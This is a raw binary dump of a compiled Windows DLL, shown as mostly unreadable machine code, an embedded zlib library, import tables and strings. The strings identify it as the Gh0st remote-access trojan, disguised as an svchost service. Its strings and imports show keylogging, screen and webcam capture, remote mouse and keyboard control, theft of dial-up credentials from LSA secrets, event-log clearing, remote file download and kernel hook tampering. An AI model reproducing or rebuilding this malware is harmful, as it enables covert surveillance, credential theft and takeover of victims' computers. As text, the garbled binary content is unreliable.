  �D$��4  VPW�(  ��_^][��Ð�������������D$SUV�t$��H  W���T  �6;ʉl$��   �|$}4���X  ���T  f��f��f;�ru��P  ��(P  :�wA�l$���T  f��f��f;�r/u��(P  ��P  :�v+�T$�L$�ቴ�T  ��H  ;�~��L$_^���T  ][ËT$_^���T  ][É��T  _^][Ð�����������������D$$SUV��H�@�L$W3���H�h�T$�P�L$$�T$ �T$0�   3���4  �t$󫋂L  �l$(���T  f�t���L  F��=  ��  ���T  �D$0�=  +���D$�t$4�L$03�3��	f�D�f�|���@;�~�|$��G�|$�|$f�D�;�`�t$ f��B4  3�;�|��+��t$$�<�f�4�ǁ���  ����  �D$��t"�l$3�f�D����  ǋl$(��ȉ��  �t$4�L$0�D$��H�L$0�D$�S����|$����   �E�f��B4   ��B4  u
��Hf�9 t�f��B4  f��B6  f��j4  ����������   ��j4  �l$3�f�E ���D$0tb���T  �t$4�M�N���t$4�t$;Ήl$(8�t�3�f�;�t"��+�3�f���苂�  ŋl$(���  f�>�D$0H�D$0��u��t$4�l$O�����l$u�_^][��Ð���������������T$�� 3��L$V�t$+�W�   f�<
��f����Nf�A�u�D$0��|6�t$,�x3�f�N��tf�TLQ��%��  BPf�TL�/  ��f���Ou�_^�� Ð������������V�t$��  ���   PQV�W   ��   ���	  RPV�C   ��(  QV������� �   3Ҋ��f���v
   uH��}狖�  �L@щ��  ^ÐQ�D$S3�Vf�HW3��D$�����ɺ   �   u
��   �   �\$��f�D�����   CU�\$�\$�h��3�f�M G;�};�tn;�}
f��t
  �0��t;D$tf���t
  f���
  ���
	f���
  �f���
  3��D$��u��   �   �;�u�   �   �
�   �   �D$��H�D$�o���]_^[YÐ��������SU�D$V�t$W���  ��~]��������Nf	��  �V���  ��N�~3Ҋ��  A�N�9���  �nf� f+�Ef�����n���  f���  �������f	��  �����  ���  ��~_�T$�B�����Nf	��  �V���  ��N�~3Ҋ��  A�N�9���  �nf� f+�Ef�����n���  f���  ��D$H��f	��  �����  ���  �l$ ���E�~Z����Nf	��  �V���  ��V�~B�V��3Ҋ��  �9�N���  A�Nf� f+�f���􉖴  f���  ���f	��  �����  3�����   ���  ��~l3�3����f���v
  ����Nf	��  �V���  ��V�^B�V��3Ҋ��  ��N���  A�Nf� f+�f���󉖴  f���  �#3����f���v
  f��f	��  �����  G;��]����D$���   HPQV�&   �T$(���	  JRPV�   ��_^][Ð�������������D$S3�3�f�XV��W�D$�����   �   u
��   �   �|$ ���0  ��G�D$ �D$U�|$�|$$��3�Bf�;щ\$�T$ };���  ;���   ���  3�f���v
  �   +�;�~g3�f���t
  ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �T$ �f���t
  f��f	��  Ή��  J�T$ �Y�����  ����  ;l$��   ���  3�f���v
  �   +�;�~g3�f���t
  ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �T$ �f���t
  f��f	��  Ή��  J�T$ ���  3�f���
  �   +�;�~f3�f���
  ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �T$ �f���
  f��f	��  Ή��  ���  ��~^�������Hf	��  �p���  �1�p�x3Ɋ��  F�p�>�H���  A�Hf� f+�f���򉰴  f���  �G  �����f	��  ���-  ��
�  ���  3�f���
  �   +�;�~f3�f���
  ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �T$ �f���
  f��f	��  Ή��  ���  ��~^�������Hf	��  �p���  �1�p�x3Ɋ��  F�p�>�H���  A�Hf� f+�f���󉰴  f���  �(  �����f	��  ���  ���  3�f���
  �   +�;�~f3�f���
  ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �T$ �f���
  f��f	��  Ή��  ���  ��	~[�������Hf	��  �p���  �1�p�x3Ɋ��  F�p�>�H���  A�Hf� f+�f�������  f���  ������f	��  �����  �\$3҅ۉl$u��   �   �;�u�   �   �
�   �   �l$$�|$��O�l$$�|$�����]_^[��Ð�����������D$��3ɋ��  SU�l$VW���p  ���  3�3�f�<J���  �A���ӉL$��   f�|����  �   +�;�~_3�f�t� ����Hf	��  �P���  ��P�XB�P��3Ҋ��  ��H���  A�Hf� f+�f��L:�f���  �  f�T� f��f	��  ��  3ۋ��  ���3��\$f���  �   +�t$;�~q�l$ 3�f���  �h����f	��  �X���  �+�XC3Ɋ��  �X��X�+�H���  A�Hf� f+�f��L$�L��\$f���  ���  �$�l$ f���  f�勈�  f	��  Ή��  �4������   ����   +ы��  +�;�~[�ڋh��f	��  �X���  �+�XC3Ɋ��  �X��X�+�H���  A�Hf� f+�f��f���  �T3����  ���f	��  Ή��  O��   s
3ۊ�������3ۊ���l$$���  3��   f�t��\$+�;�~j3�f�T� �h����f	��  �X���  �+�XC3Ɋ��  �X��X�+�H���  A�Hf� f+ˋl$ f��f���  �T3��\$���  �f�T� �l$ f��f	��  Ή��  �������   ��<�   +����  +�;�~Y����Hf	��  �p���  �1�p�X3Ɋ��  F�p��H���  A�Hf� f+΍T�f��  f���  ���f	��  ʉ��  �L$���  ;���������  3�f��  �   +�;�~b3�f��   ����Hf	��  �x���  �9�x�X3Ɋ��  G�x��H���  A�Hf� f+�f��f���  �T7����  �f��   f��f	��  Ή��  3�_f��  ^]���  [��Ð����S�\$VW3�3ҍ��   �   3�f�0���Iu�U���   �y   ��   3�f�(���Iu��   ]}�   ����   +�3�f�1���Hu���;�_���C^[Ð������������T$�L$V3���������J�����^Ð�D$S���  ��u@�H�P���  V��P�pB�P��3Ҋ��  ��HA^�H3�f���  ���  [Ã�|4�H�P���  ��P3�B���  �Pf���  ���  ������  [Ð�����D$SV���  ��~?�H�P���  ��P�pB�P��3Ҋ��  ��HA^�H3�f���  ���  [�3�;�~�P�p���  �2�PB�P^f���  ���  [Ð���V�t$WV�t����D$�����D$ǆ�     tI�N�V��V�~B�V��3ҊԈ9�N�~��A�҉N�9�~����3�G�ՋN�~��NA�N��H��t�H�D$S�V�~��:�^C@I�^u�[_^Ð���������D$jj�H(Q�P ����t"�T$�L$�P�T$�H�L$�     �P�HÐ��������SUV�t$ W�|$(�V �F�O�/�^�L$(�N0�T$$�V4�D$;�s+�I��N,+ʉL$���	��  �$��� �|$  ��   �|$(
��   �D$$�L$(�F �^��ŉO�O+É/ȋD$�O�V4�H�PWVQR3�3ҊH�PQR�  �O�V �/�^�L$@�N0�T$<�V4��;щD$,s+�I��N,+ʅ��L$t�L$H�����������D����D$3ɊH�    �H�H�H�@;؉D$s8�D$(���|  H�ˉD$(3��E �����L$$�D$,    ȋD$E;؉L$$rȋ��Y�D$$#ȋD$�@��3ɉD$�H�D$$��L$�D$$��+؋D$3Ɋ��u�H�D$�H�    ������t�D$���H�L$�I�    �H�r�����@u�D$�H�D$�H�ȋD$�H�P����D$�� ��  �    �8����@;؉D$s8�D$(����  H�ˉD$(3��E �����L$$�D$,    ȋD$E;؉L$$rȋ��Y�D$$#ȋD$H�L$�D$$��D$$��+؋D$3ɊH�    �H�H�H�@;؉D$s8�D$(���  H�ˉD$(3��E �����L$$�D$,    ȋD$E;؉L$$rȋ��Y�D$$#ȋD$�@��3ɉD$�H�D$$��L$+�3ɉD$$�D$���t�D$���H�L$�I�    �H������@��  �����@;؉D$s8�D$(���Z  H�ˉD$(3��E �����L$$�D$,    ȋD$E;؉L$$rȋ��Y�D$$#ȋD$H�L$�D$$��D$$��+؋D$�    ��+H�F(;ȉL$s �N,+ȋD$�L$��L$��N(;�r�D$�D$�H����   �L$����   �F,;ЉD$u#�F0�N(;�t��;�s+�H��D$+��D$uc�V4�T$,RWV��
  �V4�D$8�F0��;�s��+�I��N,+ʉL$�N,;щL$u�N(;�t��;�s+�H��D$+D$�D$����  �D$�L$B�D$,    �	�J��L$A�L$�L$I�L$�L$;N,u�N(�L$�HI�H�����     �k����L$����   �F,;ЉD$u#�F0�N(;�t��;�s+�H��D$+��D$uc�V4�T$,RWV��	  �V4�D$8�F0��;�s��+�I��N,+ʉL$�N,;щL$u�N(;�t��;�s+�H��D$+D$�D$����   �D$�H�D$,    �
�L$BI�L$�     ����� 	   �G�G�L�D$$�^�F ��G��+��G    ��/�G�V4�T$,RWV�(	  ��_^][��ËD$� 	   �G�G�L$$�D$(�N �^��͉G�G+�j��W�G�/V�V4��  ��_^][��ËD$$�L$(�F �^��ŉO�O+É/ȉO�L$,QWV�V4�  ��_^][��Ã�v�L$(��AM�L$(�V4�T$,RWV�x  �V4�N0��;�t7�L$$�^�N �L$(��O��P+ˋ_�W�_�/V�V4�?  ��_^][��ËD$�    �L$$�D$(�N �^��͉G�G+�j�W�G�/V�V4��  ��_^][��ËD$$�L$(�F �^��ŉO�O+�j��W�O�/V�V4��  ��_^][��ËL$$�D$(�N �^��͉G�G+�j��W�G�/V�V4�  ��_^][��Ë�s� 5� )� �� W� �� �� �� �� .� ���������D$P�D$�H(Q�P$��Ð�����������QSW�|$ jj�D$    �G(P�W �؃���u	_�����[YËT$�D$U�l$V�L$SQ�L$ RUPj j jjQ�[   ����(���u�W(SR�GY�W$����^]_[YÃ��t�}  u�G�X������W(SR�W$����^]_[YÐ��������������   ��$  SUV��$  W3��։|$T�|$X�|$\�|$`�|$d�|$h�|$l�|$p�|$t�|$x�|$|��$�   ��$�   ��$�   ��$�   ��$�   ����l�T�D�TEJ�(u�9t$Tu��$(  ��$,  �9�:_^]3�[��   Ë�$,  �   �D$X�+�l$98u	A����v��;�D$s�L$��   ��$�   9>uJ��;�u�;�T$,v�T$��   �+��;�s�\�T+3x%A����;�r��    �L$ �\T�LT+�t$Dy_^]�����[��   �މ�$�   �3�Jt3�LX��J���   u$  3ۋ
��;ωT$t#����   ��$8  ����   ���t$DB��T$��$  C;�rċL$ ���ۋ��   ��$8  �L$�L$,;���$  �|$8��$�   �D$������$�   �|$@�|$<��  �t$4�P��L�T�T$ �L$(�T$(���J�ɉT$$�F  ��T$$�+;��  B�T$P��l$�D$�T$�B͉T$�T$,+ӉL$H;�v�Ջ|$P��+˸   ��;�v+�l$$���+��l$(�;�sA;�s�}����;�v+�A;�r틬$4  �   ��E �T$<Ё��  �s�����$0  �U �T$�ǋ|$�ҍ���   �D$@�|$L�t>�|$8�D$�t$@�L$0�ˉ���   �T$L�D$1+ȋ���J��T$0+���+����t����$(  �|$8��L$H�D$;��������$8  �Ћl$*ӈT$1��$  ��;�r�D$0��I�u ��$  ;�s��   Ҁ⠀�`�T$0� +�$$  �����$   ��P�4�T$0���l$�Ⱥ   +ˋ������;D$<s!�L$@���l$0)�,�    �q�;D$<r�L$ �   ����t3����u��T$�   ��3��勌��   ����   �|$8M#�;�t �l$J+ݽ   �˃���M#�;�u�T$�D$$�l$��H�D$$�D$��������L$(�T$ ��@�L$(�L$,B;��D$�T$ ������t$D3�;�������|$,�����_^]�����[��   Ð������QS�\$,UV�C(Wjh   P�D$    �S ������u_^]�����[YËT$4�D$$�l$�L$WQ�L$4R�T$,PQh`h�h  UR���������(����   �D$$�8 ��   �T$4�D$(�L$WQ�L$8R�T$(P�D$0QhTh�V��RQ��������(��u$�T$(�: u��  w[�C(WP�S$��3�_^][YÃ��u�K(WQ�C�Y�S$����_^][YÃ��u�K(WQ�C�Y������S$����_^][YÃ��t�C�Y������K(WQ�S$����_^][YÃ��u�S(WR�C\Y�S$����_^][YÃ��t�C<Y������S(WR�S$����_^][YÐ�������D$��G�T$���G�L$��T$3���G��WÐ�QS�\$UV�t$�k4W�{0�F;��D$�|$v�k,�F+�;�v���t�|$ �u�D$     �V+�ՉF�V�C8��t�K<UWQ�ЉC<���F0�͋��|$�����D$�ʃ���|$�K,�;��|$��   �C4�s(;��t$u�s4�|$�k4+�G;�v���t�|$ �u�D$     �W+�ՉG�W�C8��t�K<UVQ�ЉC<���G0�D$�͋ы����ŋʉD$�D$����D$�L$�T$_^�Q�C0�D$][YÐ����������������D$,�L$(SU�(�@�Q V�q0W�y4�D$�A;��l$s	+�N�t$�	�I,+ωL$�L$(���Y�L$�L$,���Y�L$ ��s#�L$I�L$3ɊM �������E��r�l$�L$�t$0#�3ۊ΍4΅���  3ɊN��+��L$(��u9��@�K  ���Y�^#��3ۊ΍4΅��~  3ɊN��+��L$(��tǃ�+Ë��Y#�N�L$,�����s#�L$I�L$3ɊM �������E��r�l$�L$ �t$4#�3ۊ΍4�3ɊN��+��L$(��u1��@�,  ���Y�^#��3ۊ΍4�3ɊN��+��L$(��tσ�;�s&�L$I�L$3ɊM ������Ջl$E;Él$rڋ,��Y�N�t$#�����L$,+�+�t$��+��l$8�](;�sY�m,�l$(+��;�r��l$(+�;�v!+͊�GFMu��t$8�v(��GFIu��l$�V���^GF�GF����GFIu��l$�7���^GF�GF����GFIu��l$�3ɊN��+��N��L$GI�L$�|$  r:�|$
r3������L$<�\$�q�A�G+�t$,���\$,��;���   ��   �t$<�\$�N+ˋ���;�s�ˋ\$8+�S ��    +C�D$�ȋF�N�͉.+���F�{4_^]3�[����� tV�t$<�\$�N+ˋ���;�s�ˋ\$8+�S ��    +C�D$�ȋF�N�͉.+���F�{4_^]�   [��ËL$<�\$�q�A�G+�t$,���\$,��;�r�t$,�\$8+�S ��    +ՉC�D$��A�q�1+։)A�{4_^]�����[��Ð����������%������������%��%�V����  �D$tV�����Y��^� �%��%������������̀�@s�� s����Ë�3Ҁ����3�3����%P����������Q=   �L$r��   -   �=   s�+ȋą���@PËD$��u9�`~.��`�x���	��`u?h�   �|��Y��`u3��f�  ��`h@h @��`��   ��`YY�=��u9��`��t0��`V�q�;�r���t�ѡ�`����P�l�%�` Y^jX� U��S�]V�uW�}��u	�=�` �&��t��u"��`��t	WVS�Ѕ�tWVS������u3��NWVS�Ď�����Eu��u7WPS�������t��u&WVS�������u!E�} t��`��tWVS�ЉE�E_^[]� ��%��%l�%p�%t�%� �%� �%� �%��%| �%� �%��%��%��%����̋�\�����������\�����,�����\�����T���� ���������������̋M�������M���,�z���M���T�o���X�[�������̸��L��������̋M����H���H�1�������������̋M���eH���p��������������̍M��%@�������������������̍������%@����������������̋EP�M�Q�#J����ø���������̸���������̸h���������̍����������������5�����f�����8������������z�����F�����8������������g��� �&�����8����u���� ����J����P������8����U����,����_�����������8����5����,���銎��������������������̋EP����Yø8��������������̋EP�w���YËEP�l���YËEP�a���Yø`�k�������̸��\��������̸��L��������̍�����������_���Z���H�&����M��&���������������������̸�����������̋E�P�����Yø0�����                                                                                                                                                                                                                                                                                                                                                                                                                           x) d) P) 8)  ) ) �( �( \' j' �' �' �' �' �' �' �' �' ( ( .( D( T( f( x( �( �( �( �( �(     / ./     ".     &' �&  ' ' ' :' �& �&     L. |. `.     �  ! ! (! 6! F! V! j! x! �! �! �! �! �! �! �! �! " &" �  �  X" j" |" �" �" �" �" �" �" �" # # &# 8# T# h# t# �  �  v  �  �  H" �  h  T  F  4  $      � � � � � � � t X L 6    � � � � � � � � t h Z N 8 *  
 � � � � 8" �     �- �- j- - �, v, , �+ x+ (+     |* �* �* �* �* �* r* �* �*  + + h* ^* H* �/ 8* $* * * 
*  * �* �)     n/ V/     �) �)     �)     �& ~& n& Z& *& & & �% �% �& �% �% p% Z% J% >% *% "% % % �$ �% �& �% �# �# �# �# �# �# >& �# $ "$ :$ J$ �$ �$ �$ �$ �$ �$ x$ j$ X$     �. �. �. �.     4  �  �  �9  �  �  �  �s  �t  �  �  �  �  �	  �    �/ �/     �.         0           P?�           (@j�t��?�  p- �/ �. ����    �C  U �T �\ �X �� 0b �` �j �s �r � ��     ����    k� �� �� `�   ��     deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly             ��     ��     ��       ��     P�       P�   � � P�    �  P�   �  P�    P�                    	      
                                                                                                                                                                                                 	   	   
   
                                                                                               	
   �  L  �  ,  �  l  �    �  \  �  <  �  |  �    �  B  �  "  �  b  �    �  R  �  2  �  r  �  
  �  J  �  *  �  j  �    �  Z  �  :  �  z  �    �  F  �  &  �  f  �    �  V  �  6  �  v  �    �  N  �  .  �  n  �    �  ^  �  >  �  ~  �    �  A  �  !  �  a  �    �  Q  �  1  �  q  �  	  �  I  �  )  �  i  �    �  Y  �  9  �  y  �    �  E  �  %  �  e  �    �  U  �  5  �  u  �    �  M  �  -  �  m  �    �  ]  �  =  �  }  �   	 	 � 	 �	 S 	 S	 � 	 �	 3 	 3	 � 	 �	 s 	 s	 � 	 �	  	 	 � 	 �	 K 	 K	 � 	 �	 + 	 +	 � 	 �	 k 	 k	 � 	 �	  	 	 � 	 �	 [ 	 [	 � 	 �	 ; 	 ;	 � 	 �	 { 	 {	 � 	 �	  	 	 � 	 �	 G 	 G	 � 	 �	 ' 	 '	 � 	 �	 g 	 g	 � 	 �	  	 	 � 	 �	 W 	 W	 � 	 �	 7 	 7	 � 	 �	 w 	 w	 � 	 �	  	 	 � 	 �	 O 	 O	 � 	 �	 / 	 /	 � 	 �	 o 	 o	 � 	 �	  	 	 � 	 �	 _ 	 _	 � 	 �	 ? 	 ?	 � 	 �	  	 	 � 	 �	    @     `    P  0  p    H  (  h    X  8  x    D  $  d    T  4  t    �  C  �  #  �  c  �                       
                	                         								















   		

                            
                         (   0   8   @   P   `   p   �   �   �   �                                          0   @   `   �   �      �                               0   @   `   inflate 1.1.4 Copyright 1995-2002 Mark Adler                     	   
                           #   +   3   ;   C   S   c   s   �   �   �   �                                                                                                             p   p                     	            !   1   A   a   �   �     �                     0  @  `                                                                  	   	   
   
                     L�     0Z        ����        �               �            0Z�     �   @                    ������     ��    ��  �   x                    ������     ��    ��    (@    ����                  8@    ����                  ��                � �                   ����    ����                  8                �  �   h                    ���� �  �   �                    ���� �  �   �                    ����@�  �   �                    ����`�  �                       ������  �   0   @            ����    ����                  X        8@����gG  �   �   �            ����    ����                  �                �H  �   �                    ������     ��  �                       ������     ��  �   @                    ���� �     �  �   p                    ���� �     +�  �   �                    ����@�     K�  �   �                    ����`�     k�  �                   ����    ����                  (                �_  �   X                    ������  �   �                    ������ ������ ������  �   �   �            ����    ����                  �                Qc  �                   ����    ����                  8                .e  �   h   �            ���� �            �                     �                ��  �   �                    ���� �  �   �               ����    ����                                   ��  �   P                    ����P� p         �# �  |         �& � <         R' �  �         �)    h         �) � t         �) � �         �* P H         + � �         . $ 4         @. �  `         �. �  4         �. � �         / � (         H/ |  \         �/ � �         �/ �                     x) d) P) 8)  ) ) �( �( \' j' �' �' �' �' �' �' �' �' ( ( .( D( T( f( x( �( �( �( �( �(     / ./     ".     &' �&  ' ' ' :' �& �&     L. |. `.     �  ! ! (! 6! F! V! j! x! �! �! �! �! �! �! �! �! " &" �  �  X" j" |" �" �" �" �" �" �" �" # # &# 8# T# h# t# �  �  v  �  �  H" �  h  T  F  4  $      � � � � � � � t X L 6    � � � � � � � � t h Z N 8 *  
 � � � � 8" �     �- �- j- - �, v, , �+ x+ (+     |* �* �* �* �* �* r* �* �*  + + h* ^* H* �/ 8* $* * * 
*  * �* �)     n/ V/     �) �)     �)     �& ~& n& Z& *& & & �% �% �& �% �% p% Z% J% >% *% "% % % �$ �% �& �% �# �# �# �# �# �# >& �# $ "$ :$ J$ �$ �$ �$ �$ �$ �$ x$ j$ X$     �. �. �. �.     4  �  �  �9  �  �  �  �s  �t  �  �  �  �  �	  �    �/ �/     �.     InitializeCriticalSection  DeleteCriticalSection mVirtualFree @LeaveCriticalSection  � EnterCriticalSection  jVirtualAlloc  K CreateEventA  1 CloseHandle zWaitForSingleObject �lstrcpyA  �ResetEvent  SetEvent  InterlockedExchange ' CancelIo  >Sleep �lstrlenA  �GetPrivateProfileSectionNamesA  �lstrcatA  �GetWindowsDirectoryA  � FreeLibrary �GetProcAddress  ALoadLibraryA  dMultiByteToWideChar ~WideCharToMultiByte �lstrcmpA  �GetPrivateProfileStringA  �GetVersionExA � DeleteFileA b CreateProcessA  KGetDriveTypeA FGetDiskFreeSpaceExA �GetVolumeInformationA mGetLogicalDriveStringsA � FindClose KLocalFree � FindNextFileA NLocalReAlloc  � FindFirstFileA  GLocalAlloc  �RemoveDirectoryA  [GetFileSize O CreateFileA �ReadFile  SetFilePointer  �WriteFile ]MoveFileA hGetLastError  SetLastError  �GetSystemDirectoryA VGetFileAttributesA  �GetTempPathA  GTerminateThread ^MoveFileExA �GetTickCount  jGetLocalTime  uGetModuleHandleA  �GlobalFree  �GlobalUnlock  �GlobalLock  �GlobalAlloc �GlobalSize  �GetStartupInfoA a CreatePipe  � DisconnectNamedPipe FTerminateProcess  PeekNamedPipe xWaitForMultipleObjects  =SizeofResource  FLoadResource  � FindResourceA � DeviceIoControl BLoadLibraryExA  SetFileAttributesA  �ReleaseMutex  kOpenEventA   SetErrorMode  \ CreateMutexA  2SetUnhandledExceptionFilter � FreeConsole PLocalSize tOpenProcess �Process32Next �Process32First  o CreateToolhelp32Snapshot  ;GetCurrentProcess �lstrcmpiA >GetCurrentThreadId  KERNEL32.dll  �wsprintfA wGetWindowTextA  � GetActiveWindow GetKeyNameTextA GetFocus   CallNextHookEx  �SetWindowsHookExA �UnhookWindowsHookEx �SystemParametersInfoA ;SendMessageA  �keybd_event �MapVirtualKeyA  DSetCapture  �WindowFromPoint OSetCursorPos  �mouse_event B CloseClipboard  JSetClipboardData  � EmptyClipboard  �OpenClipboard GetClipboardData  lSetRect ]GetSystemMetrics  GetDC GetDesktopWindow  *ReleaseDC GetCursorPos  E CloseWindowStation  hSetProcessWindowStation �OpenWindowStationA  HGetProcessWindowStation � ExitWindowsEx {GetWindowThreadProcessId  �IsWindowVisible � EnumWindows C CloseDesktop  ySetThreadDesktop  �OpenInputDesktop  fGetUserObjectInformationA aGetThreadDesktop  �OpenDesktopA  �PostMessageA  ` CreateWindowExA D CloseWindow �IsWindow  USER32.dll  SelectObject  2 CreateDIBSection  - CreateCompatibleDC  � DeleteObject  � DeleteDC   BitBlt  �GetPaletteEntries ? CreateHalftonePalette GDI32.dll >IsValidSid  ELookupAccountNameA  TLsaClose  �LsaRetrievePrivateData  sLsaOpenPolicy bLsaFreeMemory �RegCloseKey �RegQueryValueA  �RegOpenKeyExA > CloseServiceHandle  � DeleteService B ControlService  �QueryServiceStatus  �OpenServiceA  �OpenSCManagerA  �RegSetValueExA  �RegCreateKeyA �RegQueryValueExA  �RegOpenKeyA = CloseEventLog 9 ClearEventLogA  �OpenEventLogA ?StartServiceA RegisterServiceCtrlHandlerExA :SetServiceStatus   AdjustTokenPrivileges MLookupPrivilegeValueA �OpenProcessToken  GLookupAccountSidA GetTokenInformation ADVAPI32.dll  � SHGetSpecialFolderPathA � SHGetFileInfoA  SHELL32.dll � SHDeleteKeyA  SHLWAPI.dll  ??3@YAXPAX@Z  �memmove Aceil  � _ftol �strstr  I __CxxFrameHandler  ??2@YAPAXI@Z  A _CxxThrowException  �strchr  �malloc  �strrchr � _except_handler3  �strncpy �realloc =atoi  �wcstombs  � _beginthreadex  @calloc  ^free  MSVCRT.dll   ??1type_info@@UAE@XZ  _initterm � _adjust_fdiv  WS2_32.dll  �?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z  -?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB � ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ   ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z  �?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z  �?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z J?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z  �?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ ?_Xran@std@@YAXXZ a?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB  MSVCP60.dll  MakeSureDirectoryPathExists DBGHELP.dll f ImmReleaseContext 2 ImmGetCompositionStringA  5 ImmGetContext IMM32.dll i InternetCloseHandle � InternetReadFile  � InternetOpenUrlA  � InternetOpenA WININET.dll H URLDownloadToFileA  urlmon.dll   capGetDriverDescriptionA   capCreateCaptureWindowA AVICAP32.dll   GetModuleFileNameExA   EnumProcessModules  PSAPI.DLL  WTSFreeMemory  WTSQuerySessionInformationA WTSAPI32.dll  �_strcmpi                �0�G    0          0 0 0 Ѕ  ��  (0 20    svchost.dll ResetSSDT ServiceMain                                                                                                                                                                                                                                                                                                                                                                                                                                                                       X                         8      �    .PAX    �    .PAD    bad Allocate    bad buffer  %s\%s   Microsoft\Network\Connections\pbk\rasphone.pbk  \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk    Documents and Settings\ ConvertSidToStringSidA  advapi32.dll    L$_RasDefaultCredentials#0  RasDialParams!%s#0  Device  PhoneNumber DialParamsUID   WinSta0\Default     %1  "%1 %s\shell\open\command   ..  .   %s\*.*  %s%s%s  %s%s*.* \   ServiceDll  ServiceDllUnloadOnStop  \Parameters Start   Type    RegSetValueEx(start)    ErrorControl    ObjectName  LocalSystem ImagePath   %SysteMRoot%\System32\svchost.exe -k netsvcs    RegSetValueEx(ServiceDll)   DisplayName SYSTEM\CurrentControlSet\Services\  ex.dll  RegQueryValueEx(Type)   SYSTEM\CurrentControlSet\Services\%s    \install.tmp    P   \syslog.dat Gh0st Update    Applications\iexplore.exe\shell\open\command    System  Security    Application \user.tmp   \user.dat   
[%02d/%02d/%d %02d:%02d:%02d] (%s)
  ]   
  BlockInput  user32  \cmd.exe    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/    LD+/b8/aa0p6b+AQC9sLCxsb388QSprrGwnw== AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    AAAA    Internet Explorer 7.0   https://    http:// ~MHz    HARDWARE\DESCRIPTION\System\CentralProcessor\0  KeServiceDescriptorTable    ntdll.dll   NtQuerySystemInformation    \\.\RESSDTDOS   BIN Global|Gh0st %d winsta0 SeDebugPrivilege    SeShutdownPrivilege explorer.exe    Winlogon    CVideoCap   #32770  1.1.4   need dictionary incorrect data check    incorrect header check  invalid window size unknown compression method  �Einvalid bit length repeat   too many length or distance symbols invalid stored block lengths    invalid block type  �EdGT]XGHG<G(GG GT]incompatible version    buffer error    insufficient memory data error  stream error    file error  stream end  ��           P�                  p          invalid distance code   invalid literal/length code 	      `        P         T  s   R        p      0    	  �   P  
      `           	  �             �      @    	  �   P        X          	  �   S  ;      x      8    	  �   Q        h      (    	  �            �      H    	  �   P        T         U  �   S  +      t      4    	  �   Q        d      $    	  �            �      D    	  �   P        \          	  �   T  S      |      <    	  �   R        l      ,    	  �            �      L    	  �   P        R         U  �   S  #      r      2    	  �   Q        b      "    	  �            �      B    	  �   P        Z          	  �   T  C      z      :    	  �   R        j      *    	  �      
      �      J    	  �   P        V         �      S  3      v      6    	  �   Q        f      &    	  �            �      F    	  �   P  	      ^          	  �   T  c      ~      >    	  �   R        n      .    	  �            �      N    	  �   `        Q         U  �   R        q      1    	  �   P  
      a      !    	  �            �      A    	  �   P        Y          	  �   S  ;      y      9    	  �   Q        i      )    	  �      	      �      I    	  �   P        U         P    S  +      u      5    	  �   Q        e      %    	  �            �      E    	  �   P        ]          	  �   T  S      }      =    	  �   R        m      -    	  �            �      M    	  �   P        S         U  �   S  #      s      3    	  �   Q        c      #    	  �            �      C    	  �   P        [          	  �   T  C      {      ;    	  �   R        k      +    	  �            �      K    	  �   P        W         �      S  3      w      7    	  �   Q        g      '    	  �            �      G    	  �   P  	      _          	  �   T  c            ?    	  �   R        o      /    	  �            �      O    	  �   `        P         T  s   R        p      0    	  �   P  
      `           	  �             �      @    	  �   P        X          	  �   S  ;      x      8    	  �   Q        h      (    	  �            �      H    	  �   P        T         U  �   S  +      t      4    	  �   Q        d      $    	  �            �      D    	  �   P        \          	  �   T  S      |      <    	  �   R        l      ,    	  �            �      L    	  �   P        R         U  �   S  #      r      2    	  �   Q        b      "    	  �            �      B    	  �   P        Z          	  �   T  C      z      :    	  �   R        j      *    	  �      
      �      J    	  �   P        V         �      S  3      v      6    	  �   Q        f      &    	  �            �      F    	  �   P  	      ^          	  �   T  c      ~      >    	  �   R        n      .    	  �            �      N    	  �   `        Q         U  �   R        q      1    	  �   P  
      a      !    	  �            �      A    	  �   P        Y          	  �   S  ;      y      9    	  �   Q        i      )    	  �      	      �      I    	  �   P        U         P    S  +      u      5    	  �   Q        e      %    	  �            �      E    	  �   P        ]          	  �   T  S      }      =    	  �   R        m      -    	  �            �      M    	  �   P        S         U  �   S  #      s      3    	  �   Q        c      #    	  �            �      C    	  �   P        [          	  �   T  C      {      ;    	  �   R        k      +    	  �            �      K    	  �   P        W         �      S  3      w      7    	  �   Q        g      '    	  �            �      G    	  �   P  	      _          	  �   T  c            ?    	  �   R        o      /    	  �            �      O    	  �   P     W    S     [    Q     Y    U  A   ]  @  P     X    T  !   \     R  	   Z    V  �   �  `  P     W  �  S     [    Q     Y    U  a   ]  `  P     X    T  1   \  0  R     Z    V  �   �  `  incomplete dynamic bit lengths tree oversubscribed dynamic bit lengths tree incomplete literal/length tree  oversubscribed literal/length tree  empty distance tree with lengths    incomplete distance tree    oversubscribed distance tree                       ?      �   �  �  �  �  �  �?  �  ��              �    .?AVtype_info@@                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               